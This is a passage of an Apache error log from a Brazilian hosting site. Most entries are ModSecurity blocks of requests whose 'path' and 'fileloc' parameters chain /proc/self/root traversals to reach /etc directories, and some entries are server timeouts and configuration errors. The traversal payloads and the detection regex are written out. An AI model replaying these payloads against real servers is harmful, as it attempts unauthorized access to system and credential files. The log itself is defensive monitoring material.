"PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfM_qxLDW4GITHUkSpDAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:32.744397 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.241.31:42934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfOAF0L0L-SsrnPo4uxQAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:39.079796 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:47754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfP_u8EFLIOrSqIpvlpwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:39.106249 2026] [core:alert] [pid 30424:tid 140411557287680] [client 57.141.18.32:35582] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:46:41.121817 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60740] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:47:10.122449 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33134] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:47:23.479406 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:47754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfa_u8EFLIOrSqIpvlxAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:47:46.169801 2026] [proxy_fcgi:error] [pid 21219:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34064] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:48:16.129813 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34842] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:48:38.045879 2026] [proxy_fcgi:error] [pid 31215:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35428] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:48:45.555345 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:40950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfvfqxLDW4GITHUkSpZgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:48:47.903276 2026] [mime_magic:error] [pid 17887:tid 140411674785536] (70014)End of file found: [client 57.141.18.26:39042] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:48:48.003359 2026] [mime_magic:error] [pid 31215:tid 140411641214720] (70014)End of file found: [client 57.141.18.85:39048] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:49:00.129835 2026] [proxy_fcgi:error] [pid 30424:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35962] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:49:03.903137 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:60716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfz_u8EFLIOrSqIpvl9wAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:49:05.505879 2026] [proxy_fcgi:error] [pid 30424:tid 140411691570944] [client 66.116.226.103:52810] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 02:49:23.723735 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36614] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:49:31.256071 2026] [mime_magic:error] [pid 31215:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:57550] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/local
[Fri Mar 20 02:49:33.502580 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:38912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzf7RCii7xarUs8iHYpsgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:49:36.028800 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:56056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzf8AkwaGbbGflqUZALwwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:49:39.458495 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:60382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzf8_XLqtnMIWvjpaJenQAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:49:46.125796 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37326] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:49:50.974943 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:60392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzf_hCii7xarUs8iHYpzAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:50:02.438743 2026] [mime_magic:error] [pid 30077:tid 140411616036608] (70014)End of file found: [client 57.141.18.118:41074] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:50:08.129783 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37936] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:50:21.883411 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:35112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgHPXLqtnMIWvjpaJetwAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:25.768330 2026] [:error] [pid 30424:tid 140411741927168] [client 74.7.241.31:36000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgIMt36Dv4L1GW-s-fGQAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:31.129779 2026] [proxy_fcgi:error] [pid 30424:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38566] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:50:31.520656 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:38706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgJ_u8EFLIOrSqIpvmHwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:37.252439 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:38720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgLAF0L0L-SsrnPo4vZgAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:40.038976 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:51094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgMBCii7xarUs8iHYp8wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:42.479011 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:51096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgMhCii7xarUs8iHYp9wAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:44.431877 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:51102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgNNa6ubjKNq_cu4aVWQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:46.411096 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:51118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgNvXLqtnMIWvjpaJexQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:48.784610 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:57836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzgOPXLqtnMIWvjpaJexwAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:50:55.149853 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39244] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:50:58.444322 2026] [core:alert] [pid 7893:tid 140411666392832] [client 74.7.241.31:57852] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd/system/sysinit.target.wants/plymouth-read-write.service&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd/system/sysinit.target.wants
[Fri Mar 20 02:51:18.149841 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39844] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:51:30.013534 2026] [mime_magic:error] [pid 7235:tid 140411624429312] (70014)End of file found: [client 57.141.18.78:43648] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:51:41.137797 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40510] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:52:03.457777 2026] [proxy_fcgi:error] [pid 30424:tid 140411607643904] [client 109.75.161.93:49956] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 02:52:08.133866 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41288] AH01075: Error dispatching request to : (polling)
